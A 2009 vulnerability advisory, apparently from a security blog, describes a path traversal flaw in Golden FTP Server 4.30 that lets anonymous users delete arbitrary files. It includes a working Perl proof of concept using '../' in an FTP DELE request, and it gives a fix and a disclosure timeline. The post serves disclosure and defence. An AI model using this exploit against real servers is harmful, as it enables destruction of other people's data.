Golden FTP Server File Deletion Vulnerability

Posted: 18th November 2009 by sharpe in Vulnerabilities
Comments Off

Summary

Sarid Harper has discovered a vulnerability in Golden FTP Server, which can be exploited by malicious, anonymous individuals to delete arbitrary files.

The vulnerability is caused by an error in the way FTP “DELE” requests are handled. This can be exploited to escape the FTP root and delete arbitrary files on the affected system by using the “../” character sequence.

Successful exploitation of this vulnerability requires that the “Enable full control” option is enabled.

Affected Versions

This vulnerability is confirmed in the following versions:

  • Golden FTP Server 4.30 Free
  • Golden FTP Server 4.30 Professional

Other versions may also be afected.

Exploit Example

use strict;
use Net::FTP

my $ftp = Net::FTP->new(“192.168.1.35″, Debug => 1) || die $@;

$ftp->login(“anonymous”, ‘anonymous@local.host’) || die $ftp->message;

# The FTP root is, via the configuration, set to C:\ftp\public
$ftp->cwd(“/public/”) || die $ftp->message;

# This deletes the file C:\bollocks.txt
$ftp->delete(“../../bollocks.txt”);

$ftp->quit;

$ftp = undef;

Resolution

Update to version 4.70 Free or Professional.

Time-line

  • Vulnerability identified: 29.10.09
  • Vendor informed: 11.11.09
  • Vendor fix: 17.02.10

References

Share

Comments are closed.